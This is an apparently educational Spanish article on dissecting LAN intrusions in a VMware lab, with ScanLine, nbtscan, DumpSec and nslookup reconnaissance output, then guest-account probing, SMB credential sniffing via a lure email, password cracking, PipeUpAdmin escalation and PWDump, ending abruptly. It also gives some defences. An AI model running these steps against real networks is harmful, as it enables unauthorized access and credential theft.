Roberto Carlos Guevara Calume

Las palabras no expresan exactamente lo que uno quiere decir”

1986 o 1987

DISECCION A INTRUSIONES, EN REDES DE

DATOS
Este es un material divulgativo que pretende mostrar el uso de herramientas informáticas de fácil uso que se encuentran en internet, cabe anotar que las pruebas y el
análisis van más allá de lo contenido es este documento.

Roberto Carlos Guevara Calume

Ingeniero de sistemas y Especialista en redes corporativas e integración de tecnologías de la universidad Sanbuenaventura,, Docente de tiempo completo del ITM

Resumen esquema de dominios de Microsoft,

Los mayores esfuerzos de los grupos de trabajos de relaciones de
administradores de redes de datos se confianza planteado Microsoft que
dirigen a evitar la violación de permiten que el atacante se infiltre a
seguridad de sus redes desde otras redes
internet, y este es solo el primer paso,
pues los ataques suelen ocurrir al
interior de la red. Palabras Claves
LAN, Ataque, Victima, Windows ,
Linux, escaneo, puertos Dirección IP.
En proceso de intrusión se observan
varias etapas en su orden
1)obtención de la información básica Abstract
(Intrusión), 2)Ataque básico, The major efforts of the administrators
3)Exploits y Vulnerabilidad of data networks are aimed at
4)Defensa, solo abordaremos la preventing the violation of security of
numerales 1y 2 their networks from the Internet, and
this is just the first step, because the
La base fundamental del atraque es attacks often occur inside the local
saber que se puede atacar, esto el network.
pilar del descubrimiento de la
LAN(red de área local)., y existen un
sin número de Herramientas con este In the process of intrusion observed
fin, una es SuperScan, otra es several stages ens or order 1) obtain
ScanLine, con estas herramientas el basic information (intrusion), 2) basic
intruso ya descubre cuales attack, 3) Vulnerability Exploits and 4)
computadores están ON-LINE y que Defense, address only the numerals 1
funciones cumplen, dentro de la red and 2
pues los puertos que están abiertos
de la maquina atacada lo dicen. The basis of the dock is that you can
attack, this cornerstone of the
El ataque de la LAN no solo pone discovery of the LAN, and there are a
directamente en peligro los equipos number of tools for this purpose is a
miembros esta pues recordemos el Superscan another ScanLine is with
 Roberto Carlos Guevara Calume

these tools the intruder and discovers Microsoft that allow an attacker to
that computers are ON-LINE and infiltrate other networks
roles within the network because the
ports are open on the machine KeyWords
attacked what they say.
LAN, Attack, Victim, Windows, Linux,
The attack not only on the LAN scanning, port IP address.
directly threatens teams miebros
remember this as the outline of
Microsoft domains, working
relationships of trust raised by

1. INTRODUCCIÓN

El creciente uso de las Tics para labores cotidianas es altamente dependiente de

la infraestructura que las soporta, equipos de computo, redes datos e internet.

Este texto está orientado a comprender en forma general como se preparan e

implementan ataques, será abordado de forma concisa pero sin desmeritar su
contenido. No se entraran a explicar de talles teóricos que pueden ser consultados
en fácilmente en Internet, sino que se recrearan ataques reales.

La intención es mostrar la visón y las herramientas que usaría una persona no

autorizada (Intruso) para tener algún dominio o acceso a información de nuestra
LAN

También se darán luces de como pueden ser contrarrestadas intrusiones y

ataques, pero dando mayor explicación de cómo se logran

2. CONCEPTOS Y DEFINICIONES INICIALES

Antes de iniciar se expondrán los conceptos y definiciones iníciales

intruso, (lat. -su)

adj. Que se ha introducido sin derecho.
adj.-s. Detentador de alguna cosa alcanzada por intrusión

Ataque
m. Acción de atacar (acometer y llevar o tomar la iniciativa).
Componente ofensivo de algo.
Acometimiento de algún accidente de que evita el normal funcionamiento
fig. Impugnación, disputa.
 Roberto Carlos Guevara Calume

hacker (voz inglesa)

com. Persona que por diversos motivos se dedica a manipular sistemas
informáticos ajenos. En otras palabras, un hacker es toda persona que pueda
tener información de nuestra LAN que no haya sido otorgada directamente, a
causa de su trabajo es un intruso, Si la información obtenida fue a través de fallas
de seguridad en la red, esa persona será un Hacker, y según su conocimiento y
las fallas de seguridad en la red este podrá implementar un atraque.

3. DISECCIÓN DE UN ATAQUE

Para la realización de un ataque se observan varias etapas de la construcción de

un ataque.

1. Obtención de la información básica (Intrusión): Esta etapa abarca el

recopilar datos e información sobre la LAN víctima. Tales como que tipos
de servidores tiene como Windows , Linux,, que sistemas operativos usan,
cuales son PDC, como se asigna el login,♣ cuales servidores tienen
montados servicios (Dhcp, Dns, etc), cuales cuantos equipos están en red y
cual es su dominio, que carpetas comparten, que puestos están abiertos,
etc.

2. Ataque básico: Esta etapa Intenta tomar privilegios o contraseñas, así

como eliminar huellas o log que den pistas de el ataque, básicamente, lo
anterior es posible por una mala configuración, políticas deficientes o por no
asegurar los sistemas, bien sea por negligencia o desconocimiento del
administrador .

3. Exploits y Vulnerabilidad: Intenta explotar, fallas conocidas de

programación en los sistemas instados para brindar vulnerar servicios como
IIS, SQL, Samba, SENDMail, FTP, Apache, y otros.

4. Defensa : Como evitar y que medidas para evitar las intrusiones, y los
ataques

♣
En muchas empresas el login de una persona puede ser construido de forma facil y de echo es información “publica”, una
política es común es usar la primera letra del nombre, el apellido y un consecutivo, p.ejm Simón Bolívar tendría
SBOLIVAR1 en caso de no tener Homónimos.
 Roberto Carlos Guevara Calume

3.1 QUE SE ESTA ATACANDO

La Obtención de la información, ya que un ataque esta muy estrechamente

relacionado, con el tipo de sistema operativo Victima, el protocolo de usado, los
servicios y puertos comprometidos.

Partiendo de las diferencias claras de estos 2 sistemas Operativos y su difusión,

tanto en arquitectura, how know, seguridad y productos usados es pertinente esta
división.

El modelo usado estará basado en TCP/IP (4 capas sin importar lo físico) pero las
capas se tomaran como indica el modelo OSI (7 capas). Los protocolos de capas
1,2 en OSI no son relevantes, con excepción de la dirección MAC.

Lo anterior por ser el conjunto de protocolos TCP/IP el mas usado tanto en LAN
como en WAN, es de anotar que se no se usa un direccionamiento IP sino un IPX
y un transporte TCP o UDP sino SPX nada de lo siguiente funcionará.

En cuanto a los productos, por ejemplo, el ataque efectuado a IIS, no será igual al
realizado a Apache. Los programas usados para hacer estos ataques se
mencionarán y se dirigirá al sitio en Internet donde se podrán acceder, en lo
posible se usarán herramientas gratuitas.

3.2 ESQUEMA IMPLEMENTADO

Para realizar los ataques se implemento la siguiente LAN en MVWare

Nombre del PC Direccion IP Servicios

WINXP 192.168.0.1 No
LINUX01 192.168.0.2 FTP,CORREO
WIN2000 192.168.0.3 PDC,DNS,DHCP,FTP,
HTTP
LINUX02 192.168.0.10 FTP
WIN98 192.168.0.200 No
Tabla 1 Conformación de la red implementada
 Roberto Carlos Guevara Calume

Ilustración 1 Diseño de la red implementada

4. INTRUSIONES EN WINDOWS.

Es necesario que el lector conozca el sistema operativo Windows, que conozca

sus características básicas como que son PDC y BDC, que es un dominio, las
diferencias entre Linux y servidores windows, que es un bosque y un árbol,
además de experiencia en la instalación de paquetes.

El problema empieza cuando un intruso intenta atacar nuestra LAN, bien sea
desde Internet o desde el interior, o bien capture la información desde el interior y
ataque de fuera♣.

Descubriendo la LAN
Un atacante puede tener información de muchas formas, en nuestra LAN victima,
la información puedes ser recopilada por Internet, por personal de soporte al
interior, o por personas que tengan acceso a un punto de red.

♣
La mayoría de los ataque son realizados por personas que conocen el interior de la LAN, pero si no se tuviera esta
información, es posible obtenla.
 Roberto Carlos Guevara Calume

Escaneo
Que sucede si el intruso no esta en Internet buscando una victima, si no que es
una persona que conoce la LAN, sabe cual es el direccionamiento IP usado, cual
es el dominio, como se construyen los LOGIN, que hacen y cuales son los
servidores.

Entonces este intruso esta más cerca de poder implementar un ataque, Hay que
recordar que en su gran mayoría los ataques son realizados por personal que de
una u otra forma tiene contacto directo con la LAN.

De no ser así, y el escenario fuera que el intruso no conoce nada acerca de la

LAN pero tiene acceso a un punto de red, este podría recopilar esta información,
desde el interior haciendo escaneo.

Ping y Escaneo de Puertos

El ping es usado para descubrir si un pc esta ON-LINE este es un mensaje ICMP
de eco, si el intruso desconoce por completo la LAN victima, este intentará hacer
ping a varias direcciones IP y mirar cual de ellas esta ON-LINE y también querría
saber cuales puertos de esas ip que contesten estan abiertos.

Esto es el pilar del descubrimiento de la LAN, y existen un sin número de

Herramientas con este fin, una es SuperScan♣, otra es ScanLine♣♣

INTRUSIÓN USANDO ESCANEO CON SCANLINE Narración

Paso Uno Escanea una red clase C
privada desde
Ejecutar el programa con parámetros asi: 192.168.0.1
C:> sl -htLT 192.168.0.1-192.168.0.254 A 192.168.0.254 y
descubre cuales equipos
estan ON-LINE y que
Los modificadores htLT no son totalmente necesarios puertos tienen abiertos
TCP y UDP
-------------------------------------------------------------------------------
192.168.0.1
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes La ip 192.168.0.1
Esta ON-LINE

TCP ports: 7 9 13 19 21 25 80 110 135 139 389 443 445 1024 1025 1027 1720 2869
5000
UDP ports: 7 9 53 67 68 123 135 137 138 161 445 500 520 1900 3456
------------------------------------------------------------------------------
192.168.0.2
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 22 23 25 79 80 111 113 139 389 515 587 901 1720 10000
UDP ports: 68 69 111 123 135 137 138 161 191 192 256 260 407 445 500 514 520 Respondió la IP
1009 1024 1025 1027 1028 1030 1033 1034 1035 1037 1041 1058 1060 109 192.168.0.2
1 1352 1434 1645 1646 1812 1813 2002 2049 2140 2161 2301 2365 2493 2631 2967
3179 3327 3456 4156 4296 4469 4802 5631 5632 11487 31337 32768 32769

♣Puede ser bajado de http://www.foundstone.com/rdlabs/tools.php?category=scanner, es un scanner de IP y puertos

grafico de facil uso.
♣♣
herramienta en modo texto fácil de usar y muy rápida http://www.foundstone.com/rdlabs/tools.php?category=scanner
 Roberto Carlos Guevara Calume

32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781
32782 32783 32784 32785 32786 32787 32788 32789 32790
-------------------------------------------------------------------------------
192.168.0.3
Responded in 10 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 25 53 80 88 119 135 139 389 443 445 563 593 636 1027 1029 1720
1723 3268 3372 Respondió la IP
UDP ports: 53 123 135 137 138 161 445 500 1028 1645 1646 1812 1813 3456 192.168.0.3
-------------------------------------------------------------------------------
192.168.0.10
Responded in 10 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 22 25 79 80 110 111 113 389 515 587 901 1720 10000
UDP ports: 68 69 111 123 135 137 138 161 191 192 256 260 407 445 500 514 520
1009 1034 1035 1037 1041 1058 1060 1091 1352 1434 1645 1646 1812 1813 1900 Respondió la IP
1978 2002 2631 2967 3179 3327 3456 4045 4156 4296 4469 4802 5631 5632 11487 192.168.0.200
31337 32768 3276 32779 32780 32781 32782 32783 32784 32785 32786 32787
32788 32789 32790 43981
-------------------------------------------------------------------------------
192.168.0.200
Responded in 10 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 139 389 1720
UDP ports: 137 138
-------------------------------------------------------------------------------

Scan finished at Wed Jun 04 03:42:52 2003

4 IPs and 1068 ports scanned in 0 hours 0 mins 32.92 secs

Tabla 2 Intrusión usando Scanline

El intruso ya descubrió cuales computadores están ON-LINE y que funciones

cumplen, pues los puertos que están abiertos lo dicen, por lo cual es muy útil tener
a la mano un listado de puertos y la función asociada veamos unos pocos
ejemplos.

Puerto Transporte Servicio Descripción

21 UDP FTP Protocolo de transferencia de archivos
53 TCP DNS Sevidor de Nombres
80 TCP HTTP Servidor WEB
137 UDP NBNS Servicio de Nombres Netbios
445 TCP SMB sobre netbios
10000 TCP Webmin
Tabla 3 Algunos Puertos

Descubriendo dominios y grupos de trabajo

Recordemos el esquema de dominios, grupos de trabajos de relaciones de

confianza planteado Microsoft.

INTRUSIÓN USANDO NET VIEW Narración

Paso Uno Muestra los grupos de

trabajo y dominos de la
Ejecutar el programa con parámetros asi: red
 Roberto Carlos Guevara Calume

C:> net view /domain

Dominio
--------------------------------------------- Existen 3 grupos de
GRUPOLINUX trabajo
INTRUSO
RCGCALUME
Se ha completado el comando correctamente.
Paso Dos Muestra la equipos
asociados a
Ejecutar el programa con parámetros asi: RCGCALUME

C:> net view /domain: RCGCALUME

Servidor Descripción Existen dos equipos

---------------------------------------------
\\WIN2000
\\WIN98
Se ha completado el comando correctamente.
Tabla 4 Uso de NetView

Descubriendo La red PDC y Mas.

Si un intruso sabe que la LAN victima es una red Microsoft querrá saber mas
información de los equipos ONLINE. De la intrusión con Scanline sabemos que
están ON-LINE las IP 192.168.0.1 , 192.168.0.2, 192.168.0.3 y 192.168.0.200.

Por lo cual queremos saber mas de una IP en espacial y usamos un comando

llamado NBTSTAT♣.

Sin embargo se recomienda usar el un programa llamado NBTSCAN♣♣, el cual es

,mas completo utilizando mas modificadores.

En este momento el intruso debe saber de una u otra forma el rango de

direcciones IP de la LAN victima, pues luego de hacer varios de escaneos a la
LAN el conocer estos rangos es cuestión de tiempo.

Con la información arrojada por el escaneo logramos detectar que la red es una
clase C privada, 192.168.0.0 e intuimos una mascara 255.255.255.0 ver intrusión
de escaneo .

Pero podemos descubrir más.

INTRUSIÓN USANDO ESCANEO NBTSCAN Narración

Paso Uno Escanea la red clase C

privada 192.168.0.0
Ejecutar el programa con parámetros asi: usando una mascare de
C:> nbtscan 192.168.0/24 24 bit 255.255.255.0

♣
Este es un comando que viene con los sistemas operativos Microsoft
♣♣
Se pude bajar de www.inetcat.org/software/nbtscanf.html
 Roberto Carlos Guevara Calume

En pocos segundos nos

Doing NBT name scan for addresses from 192.168.0.0/24 muestra la IP de cada
equipo que respondió
IP address NetBIOS Name Server User MAC address El nombre Netbios y
------------------------------------------------------------------------------ usuario que hizo login en
192.168.0.0 Sendto failed: Cannot assign requested address cada equipo y la MAC
192.168.0.1 WINXP <server> <unknown> 00-50-56-c0-00-01
192.168.0.3 WIN2000 <server> ADMINISTRADOR 00-50-56-dc-eb-b8 NOTA: el equipo
192.168.0.10 Recvfrom failed: Connection reset by peer INTRUSO. Donde se
192.168.0.2 LINUX01 <server> LINUX01 00-00-00-00-00-00 esta ejecutando todo es
192.168.0.200 WIN98 <server> USR1 00-50-56-dd-40-9d WINXP y nunca se a
autenticado en la red
Tabla 5 Uso del NBScan (1)

Es posible tener mas información, sobre cada dirección IP así

INTRUSIÓN USANDO ESCANEO NBTSCAN Narración

Paso Uno Escanea la red clase C privada

192.168.0.0 usando una mascara de 24 bit
Ejecutar el programa con parámetros asi: 255.255.255.0
C:> nbtscan -v -s : 192.168.1.0/24
Los 3 puntos son los separadores

192.168.0.0 Sendto failed: Cannot assign requested address Muestra la IP, el ,nombre Netbios del
equipo y un código
192.168.0.1....WINXP ....00U
192.168.0.1....WINXP ....20U 192.168.0.0
192.168.0.1....INTRUSO ....00G como es de suponer esa dirección es el Id
192.168.0.1....INTRUSO ....1eG de red y no la IP asignada a un equipo, y
192.168.0.1....INTRUSO ....1dU por eso da un error.
192.168.0.1....☺☻__MSBROWSE__☻ ....01G
192.168.0.1....MAC....00-50-56-c0-00-01 192.168.0.1
00U : nombre de maquina WINXP
192.168.0.2....LINUX01 ....00U 20U: Servidor
192.168.0.2....LINUX01 ....03U 00G: Nombre del dominio INTRUSO
192.168.0.2....LINUX01 ....20U 1EG y 1DU: grupo INTRUSO
192.168.0.2....☺☻__MSBROWSE__☻....01G 01G: equipo principal de su grupo
192.168.0.2....GRUPOLINUX ....00G
192.168.0.2....GRUPOLINUX ....1dU por ultimo la dirección MAC
192.168.0.2....GRUPOLINUX ....1eG
192.168.0.2....MAC....00-00-00-00-00-00 092.168.0.2
Se llama LINUX01,
192.168.0.3....WIN2000 ....00U Es Servidor, Pertenece a GrupoLINUX
192.168.0.3....WIN2000 ....20U
192.168.0.3....RCGCALUME ....00G 03U: usuario de mensajeria LINUX01,
192.168.0.3....RCGCALUME ....1cG generalmente es el Mismo LOGIN
192.168.0.3....RCGCALUME ....1bU La MAC es 00-00-00-00-00-00 Muy Raro!!
192.168.0.3....RCGCALUME ....1eG O Puede ser que NO es un equipo
192.168.0.3....WIN2000 ....03U Windows normal.
192.168.0.3....RCGCALUME ....1dU
192.168.0.3....☺☻__MSBROWSE__☻....01G 192.168.0.3
192.168.0.3....INet~Services ....1cG Se llama WIN2000
192.168.0.3....IS~WIN2000....00U Es Servidor, Pertenece a RCGCalume
192.168.0.3....ADMINISTRADOR ....03U 1CG: Es un Controlador de Dominio
192.168.0.3....MAC....00-50-56-dc-eb-b8 Llamado RCGCalume osea el grupo y el
Dominio se llaman Igual ¡!!
192.168.0.10 Recvfrom failed: Connection reset by peer 1CG: Ofrece servicios como DHCP,DNS
00U: aquí indica que es servidor IIS

192.168.0.10
192.168.0.200....WIN98 ....00U Este responde pero no entrega información
192.168.0.200....RCGCALUME ....00G puede ser un equipo con un sistema
192.168.0.200....WIN98 ....03U operativo diferente a Windows.
192.168.0.200....WIN98 ....20U
 Roberto Carlos Guevara Calume

192.168.0.200....RCGCALUME ....1eG 192.168.0.200

192.168.0.200....USR1 ....03U Se llama Win98 Grupo RCGCalume
192.168.0.200....MAC....00-50-56-dd-40-9d
Paso dos
Observar
Ejecutar el programa con parámetros asi: hay un Nuevo parámetro -h

C:> nbtscan -v –h –s… 192.168.0/24

192.168.0.0 Sendto failed: Cannot assign requested address

192.168.0.1....WINXP ....Workstation Service Con este parámetro es mas facil conocer
192.168.0.1....WINXP ....File Server Service la LAN sin Códigos de Netbios,
192.168.0.1....INTRUSO ....Domain Name Analizar
192.168.0.1....INTRUSO ....Browser Service Elections
192.168.0.1....INTRUSO ....Master Browser
192.168.0.1....☺☻__MSBROWSE__☻....Master Browser
192.168.0.1....MAC....00-50-56-c0-00-01
192.168.0.10 Recvfrom failed: Connection reset by peer
192.168.0.3....WIN2000 ....Workstation Service
192.168.0.3....WIN2000 ....File Server Service
192.168.0.3....RCGCALUME ....Domain Name
192.168.0.3....RCGCALUME ....Domain Controllers
192.168.0.3....RCGCALUME ....Domain Master Browser
192.168.0.3....RCGCALUME ....Browser Service Elections
192.168.0.3....WIN2000 ....Messenger Service
192.168.0.3....RCGCALUME ....Master Browser
192.168.0.3....☺☻__MSBROWSE__☻....Master Browser
192.168.0.3....INet~Services ....IIS
192.168.0.3....IS~WIN2000....IIS
192.168.0.3....ADMINISTRADOR ....Messenger Service
192.168.0.3....MAC....00-50-56-dc-eb-b8
192.168.0.2....LINUX01 ....Workstation Service
192.168.0.2....LINUX01 ....Messenger Service
192.168.0.2....LINUX01 ....File Server Service
192.168.0.2....☺☻__MSBROWSE__☻....Master Browser
192.168.0.2....GRUPOLINUX ....Domain Name
192.168.0.2....GRUPOLINUX ....Master Browser
192.168.0.2....GRUPOLINUX ....Browser Service Elections
192.168.0.2....MAC....00-00-00-00-00-00
192.168.0.200....WIN98 ....Workstation Service
192.168.0.200....RCGCALUME ....Domain Name
192.168.0.200....WIN98 ....Messenger Service
192.168.0.200....WIN98 ....File Server Service
192.168.0.200....RCGCALUME ....Browser Service Elections
192.168.0.200....USR1 ....Messenger Service
192.168.0.200....MAC....00-50-56-dd-40-9d
Tabla 6 Uso del NBScan(2)

INTRUSIÓN USANDO DUMPSEC Narración

Esta es una herramienta grafica que puede dar información de permisos, del Se dirigio a la ip
filesystem, registry, printer, archivos compartidos, usuarios grupos etc, viene en 192.168.0.3
el
07/06/2003 05:22 a.m. - Somarsoft DumpSec (formerly DumpAcl) - \\192.168.0.3
UserName
Este e un reporte pero,
Administrador explore que posibilidades
FullName diferentes ofrece,
Comment Cuenta para la administración del equipo o dominio
PswdCanBeChanged Yes
HomeDir El reporte original es mucho
mas extenso
Invitado
FullName
Comment Cuenta para acceso como invitado al equipo o dominio
PswdCanBeChanged No
HomeDir
 Roberto Carlos Guevara Calume

Jjaramillo1
FullName Juan Jaramillo
Comment Gerente de marcadeo, tel 299-0077 ext 341
PswdCanBeChanged Yes
HomeDir \\win2000\Mercadeo

IUSR_WIN2000
FullName Cuenta de invitado a Internet

Tabla 7 Uso del DUMPSEC

A simple Vista un Intruso puede reconstruir con estas herramientas la LAN victima,
solo con un portátil y un punto de red, pero como evitar esto?

Una forma es bloqueando los puertos TCP y UDP 135,136,137,138,139 y 445

usando un FIREWALL para evitar intrusos desde Internet ó deshabilitando estos
puertos en cada equipo de la red

PROTECCIÓN INTRUSIÓN USANDO ESCANEO (1) Narración

Contra (1,2,3,4,5) Windows XP y 2000

Se Selecciona la conexión que se desee, Por

Paso Uno ejemplo : Para Internet la de Acceso telefonico y
//INICIO //PANEL DE CONTROL //CONEXIONES DE RED para la LAN LA conexión de Área Local y Se
//PROPIEDADES selecciona PROPIEDADES

PASO DOS
//GENERAL //PROPIEDADES En la pestaña GENERAL Se Selecciona TCP/IP
y se selecciona el botón PROPIEDADES

En la pestaña GENERAL se selecciona el botón

//GENERAL //OPCIONES AVANZADAS OPCIONES AVANZADAS

En la pestaña OPCIONES se selecciona

//OPCIONES // FILTRADO TCPIP //PROPIEDADES FILTRADO TCPIP Y selecciona el botón
PROPIEDADES

Luego usar el Editor para permitir o bloquear

puertos TCP o UDP
 Roberto Carlos Guevara Calume

PREGUNTANDO AL DNS

Podemos preguntar al DNS de la red muchas cosas las cuales nos serán muy
útiles, el comando usado es NSLOOKUP♣ , y lo primero es preguntar quien es el
DNS, aunque lo sospechamos pues solo hay un PDC que es WIN2000.

Otra cosa que aun no sabemos es como se llama el dominio, dominio.com o

dominio.edu.co . pero no hay problema NSLOOKUP lo dirá

INTRUSIÓN USANDO NSLOOKUP Narración

Paso Uno Usamos WIN2000 pues

sospechamos de es un DNS,
Ejecutar el programa con parámetros asi: pero pudimos usar cualquier
C:> nslookup win2000 otro equipo en la red. como
LINUX01...

Nombre: win2000.rcgcalume.org Eureka el dominio es

Address: 192.168.0.3 RCGCalume.org
Paso Dos
Este comando nos deja en un
Ejecutar el programa con parámetros asi: prompt >
C:> nslookup
>ls rcgcalume.org
rcgcalume.org. A 192.168.0.3
rcgcalume.org. NS server = win2000.rcgcalume.org Y nos aparece la tabla DNS
rcgcalume.org. NS server = www.win2000.rcgcalume.org con ip y direcciones para la
rcgcalume.org. NS server = www.linux01.rcgcalume.org tipos A NS.
gc._msdcs A 192.168.0.3
linux01 A 192.168.0.2 Los equipos LINUX01 y
www.linux01 A 192.168.0.2 .WWW.LINUX01 Tienen la
linux02 A 192.168.0.10 misma IP, en este caso un
win2000 A 192.168.0.3 computador tienen 2 nombres,
www.win2000 A 192.168.0.3
winxp A 192.168.0.1
Paso tres
Bueno y el servidor de correo
Ejecutar el programa con parámetros asi: Sin salir del prompt que, cual es ?, el tipo MX ,
>ls -t MX rcgcalume.org

rcgcalume.org. MX 10 linux01.rcgcalume.org OK, es el linux01, la IP

>exit 192.168.0.10
Exit para salir
Tabla 8 NSLookup

Esta información puede pedirse y es enviada, por que el servidor DNS es

consiente que pueden existir otros DNS actuando en forma solidaria, y por que
pueden haber otros dominios a los que mandar y recibir información, sin embargo
podemos restringir las direcciones IP autorizadas a recibir esta información

PROTECCIÓN INTRUSIÓN DNS en Windows 2000 server Narración

// INICIO // PANEL DE CONTROL // HERRAMIENTAS Llegamos a la parte de configuración de DNS

ADMINISTRATIVAS // DNS Luego....

♣
Nslookup viene de forma estandart con windows
 Roberto Carlos Guevara Calume

// XXX // Zonas de Búsqueda Directa // YYY Donde

XXX Es Equipo que contiene el DNS,
YYY Es el domino a proteger, hacer click
derecho en YYY

// PROPIEDADES // Transferencias de Zona // Del menú contextual Seleccionar el item

Propiedades y seleccionar la pestaña de
Trasnferencias de Zona.

Luego según las necesidades se pueden

deshabilitar completamente o, elegir que ciertas
direcciones IP pregunten directamente.
Tabla 9 Protección al DNS

Sumario:
• Es una red, privada clase C, tiene varios, servicios DNS (53), FTP(21),
Correo(110), LDAP(389), WEB(80), NETBIOS(138 -138), WEBMIN(10000) .
• La red tiene varios grupos de trabajo GrupoLinux, RCGCalume, e INTRUSO el
grupo creado por el atacante, este computador solo tiene configurada una ip
valida, nada mas.
• Se conocen los computadores que pertenecen a cada grupo,
• Se Conoce el nombre Netbios de Cada maquina su IP y el usuario que hizo el
login en cada computador, la mac y la cuenta de mensajes , Intrusion
• Se sabe que existe un PDC que pertenece al grupo RCGCalume y se llama
WIN2000, y tiene IIS montado.
• Se tiene información de cada cuenta creada en el PCD e información basica
como nombres del usuario cargo, teléfono y correo, además se puede intuir la
forma con que se asignan los login y los directorios asignados a cada usuario
• Se sabe cual es el nombre del dominio, y los nombres tanto reales de las ip
como los alias, se sabe cual es el servidor de correo
• Cualquier otra información detallada se puede consultar al AD.

5. ATAQUES EN WINDOWS
Luego de la intrusión, ósea el solo tener información viene el ataque que empieza
con la obtención de una contraseña, bien sea adivinada, robada, encontrada por
casualidad o tomada a la fuerza.

La cuenta de invitado

La cuenta de invitado, por defecto esta desactivada, pero los administradores y

pasa mucho, cuando se necesita una cuenta de usuario con pocos privilegios y
momentáneamente Habilitan la cuenta de invitado, esta cuenta no tiene password,
aunque puede ser cambiada, esto es importante por que una cuenta desactivada
pero no borrada o renombrada.
 Roberto Carlos Guevara Calume

ATAQUE ADIVINANADO CONTRASEÑAS Narración

USANDO NET USE Se intenta establecer si la cuenta de
invitado esta borrada , habilitad o
deshabilitada
Paso Uno

Ejecutar el programa con parámetros así En este caso esta desactivada pero no
borrada.
C:\>net use \\192.168.0.3\IPC$ * /u:invitado
Escriba la contraseña para \\192.168.0.3\IPC$:
Error de sistema 1331.

Error de inicio de sesión: la cuenta está desactivada.

En este caso esta activada y no tiene
C:\>net use \\192.168.0.3\IPC$ * /u:invitado password (enter)
Escriba la contraseña para \\192.168.0.3\IPC$:
Se ha completado el comando correctamente.

C:\>net use \\192.168.0.3\C$ * /u:invitado Aquí esa contraseña fue eliminada o

Escriba la contraseña para \\192.168.0.3\C$: renombrada
Error de sistema 1326.

Error de inicio de sesión: nombre de usuario desconocido o contraseña

incorrecta
.
Tabla 10 Cuenta de invitado

Adivinar Contraseñas

Para Adivinar contraseñas debemos usar una herramienta tal, que si sabemos un
nombre de usuario, la herramienta sea capaz de encontrar el password,
autenticándose a un servidor, esto equivale a hacer manualmente muchas
autenticaciones hasta lograr el acceso, lo cual sería casi imposible.

Existen muchas herramientas para adivinar o crakear contraseñas, dentro de las

más conocidas y que usaremos estan.

Brutus
La Herramienta llamada Brutus, puede enviar muchos paquetes SMB
directamente al servidor a atacer, con el usuario, dominio y un password, este
password puede ser adquirido de varias formas, una es la fuerza bruta, osea el
password es generado, o el password es leido de un archivo llamado Diccionario.

SMBRelay
Esta es una alternativa, No grafica y muy rápida para poder “ interceptar los datos
de login en la red, esta herramienta genera un archivo donde se guarda la el
password encriptado, y luego sobre este archivo de puede ejecutar una cracker
para que la desencripte.
 Roberto Carlos Guevara Calume

L0PHTCrack
Otra herramienta llamada L0phtCrack puede hacer lo anterior y además puede
capturar, el archivo SAM, vaciar los passwords desde el registry además de
capturar el trafico SMB en toda la red o el trafico SMB desde o hacia un equipo en
particular, y que mejor que el propio PDC.

L0phtCrack Captura el trafico y extracta información como:

- IP origen y destino
- USER NAME
- Contraseña encriptada

Luego el L0phtCrack intenta sacar la contraseña original de la contraseña

encriptada, el asunto ahora, es cuestión de tiempo, si es una contraseña débil,
solo caracteres, o peor palabras que puedan estar en un diccionario (normal)o
corta 5 o menos caracteres , podemos decir que el asunto es cuestión de minutos
u horas según qué tan “mala sea la contraseña” el tiempo pueden ser meses,
años o lustros o más mucho más si es de 16 o más caracteres con mayúsculas,
minúsculas, caracteres especiales, y números.

SMB SNIFFING
Al momento de hacer la autenticación los datos los datos de login y password de
usuario pasan por la red, este es momento en el que se produce el ataque.
usando una utilidad del L0phtcrack llamada SMB Packet Capture, en la versión
2.5♣

Ilustración 2 Pantalla de salida de L0phtcrack

Con esto tenemos password y una contraseña validos en el dominio. Pero con una
cuenta limitada, estamos limitados, es preferible ser el administrador.

♣
Al momento de hacer este ataque encontré la versión mejorada, llamada LC4, y la utilidad cambio de nombre llamándose
IMPORT FROM Sniffer.
 Roberto Carlos Guevara Calume

Suponemos que por cualquier razón la contraseña no pueda ser capturada al

inicio de la sesión, Por ejemplo la del administrador aun es posible que las
credenciales SMB pasen por la red.

ATAQUE A CONTRASEÑAS USANDO SMB Sniffing Narración

Se obligar a la victima enviar credenciales SMB y
crackear la contraseña, la herramienta L0Phtcack
hace todo
Paso Uno
El asunto consiste en obligar a la victima a
C:\> NET USE \\X.X.X.X\FILE elecutar una instrucción como esta, con lo cual
este reenviara sus contraseñas

Paso Dos
Para: jjaramillo1@linux02.rcgcalume.org
Cc: administrador@linux02.rcgcalume.org
Asunto: Algo sugestivo
como obligarlo??
Una forma es enviando un correo, recoredemos
que tenemos el login y password de un usuario
“legal” mmarulanda y tenemos una lista de
usuarios posible victimas (Sin password
crackeado) ,Jjaramillo1, invitado, Administrador

Hola. Configuramos la cuenta de correo de

Xx xxxxx xxx xxxxxxx xx x xxxx xxxx
En esta dirección
File://192.168.0.3/oferta.doc
mmarulanda1 o enviamos un e mail anónimo
(que luego veremos), en un equipo y como ya
sabemos que el servidor linux02 es servidor de
corrreo(7) y el dominio RCGCalume.org
Enviamos el correo.
el archivo oferta.doc puede no existir.

PipeUPADMIN.

Pipeupadmin es un programa que permite que cualquier usuario sea incluido en la

lista de administradores de un equipo, la única restricción es que debe ser
ejecutado desde consola, (en el teclado del equipo atacado) o desde una sesión
de terminal Server.

Si el servidor no esta custodiado, se puede llevar un diskett pues es un solo

ejecutable de 46k, si no es posible el acceso directo solo se realiza una sesión
terminal Server, ejecutar el programa y reiniciar en una cuenta como
administrador.

Narración
ATAQUE USANDO PIPEUPADMIN Usando Terminal Server Se obligar a la victima a dar permisos
de administrador,
Paso 1

Usando el ataque (2) SMB Sinfín

 Roberto Carlos Guevara Calume

pudimos tener una usuario y una

contraseña iniciar una secion Interactiva

Paso Dos No siempre es tan fácil en encontrar

una cuenta que permita ejecutar
Corremos pipeupadmin programas desde diskquet, pero se
puede copiar al espacio de disco
C:/> pipeupadmim asignado en el servidor.

El encontrar cuentas y contraseñas con

mas privilegios es decisivo al momento
del ataque

PWDump

Este programa es capas de tomar todas las cuentas con sus respectivas
contraseñas encriptadas que luego pueden ser des encriptadas con L0Phtcack
LC4

ATAQUE A CONTRASEÑAS PWDUMP Narración

